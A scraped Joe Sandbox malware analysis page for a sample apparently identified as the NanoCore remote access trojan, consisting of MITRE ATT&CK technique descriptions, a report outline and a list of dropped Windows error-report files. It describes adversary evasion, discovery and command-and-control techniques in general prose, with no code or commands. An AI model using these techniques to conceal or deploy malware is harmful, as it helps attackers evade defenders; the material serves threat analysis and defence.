Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report xeWd55M5Lb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

Stealing of Sensitive Information

Remote Access Functionality

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltqmdmdi.exe_b58c0ec6d77fd91917e203a247ad37012bab_08a210e2_11a9d774\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ltqmdmdi.exe_b58c0ec6d77fd91917e203a247ad37012bab_08a210e2_1b19ab92\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C21.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA1A0.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA308.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE10.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2F3.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4E8.tmp.xml

Windows Analysis Report
xeWd55M5Lb

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre